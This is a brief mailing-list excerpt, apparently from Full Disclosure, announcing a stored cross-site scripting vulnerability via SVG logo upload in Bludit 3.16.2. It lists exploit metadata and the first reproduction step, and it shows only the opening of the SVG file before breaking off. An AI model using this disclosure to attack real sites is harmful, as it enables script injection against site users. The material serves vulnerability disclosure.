Posted by Andrey Stoykov on Jul 07
# Exploit Title: XSS via SVG File Upload – bluditv3.16.2
# Date: 07/2025
# Exploit Author: Andrey Stoykov
# Version: 3.16.2
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/
XSS via SVG File Upload #1:
Steps to Reproduce:
1. Login with admin account and click on “General” > “Logo”
<?xml version=”1.0″ standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN”…
– Read More – Full Disclosure
